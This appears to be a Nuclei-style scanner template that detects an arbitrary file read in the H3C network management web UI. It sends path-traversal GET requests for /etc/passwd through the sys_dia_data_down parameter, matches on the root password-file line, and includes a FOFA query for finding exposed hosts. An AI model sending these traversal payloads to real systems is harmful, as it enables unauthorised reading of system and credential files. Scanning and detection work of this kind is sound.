id: h3c-nms-webui-fileread

info:
  name: H3C 网络管理系统 webui - foleread
  author: leadlife
  severity: high
  description: h3c用户网管登录系统jQuery-1.7.2存在任意文件读取漏洞，其1.7.2版本的sys_dia_data_down模块存在任意文件读取漏洞，攻击者可通过前台读取任意文件。
  metadata:
    verified: true
    fofa-qeury: body="webui/js/jquerylib/jquery-1.7.2.min.js"
  tags: fileread,h3c,nms

http:
  - method: GET
    path:
      - "{{BaseURL}}/webui/?file_name=../../../../../etc/passwd&g=sys_dia_data_down"
      - "{{BaseURL}}/webui/?g=sys_dia_data_down&file_name=../../etc/passwd"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200

